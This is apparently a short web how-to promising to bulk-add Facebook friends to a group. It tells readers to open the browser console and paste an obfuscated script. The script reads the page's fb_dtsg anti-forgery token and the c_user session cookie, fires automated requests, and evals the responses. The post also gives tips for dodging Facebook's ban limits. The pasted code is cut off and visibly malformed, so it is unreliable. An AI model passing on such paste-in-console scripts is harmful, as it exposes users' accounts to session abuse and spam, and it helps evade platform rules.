Add Friends on Facebook Group with Script Open required group and close all other tabs. When you have added 500 friends close your browser to stop script and after two minutes again repeat the procedure.Facebook will ban you from adding people to group if you add more than 1000 friends in one click.So add your friends in patches and be secure. Copy this code(Only in blue color) : Press cntrl+shift+ i for chrome to open console Press cntrl+shift+ k for firefox to open console Paste below script and press enter :) SCRIPT: (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;"GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.sub...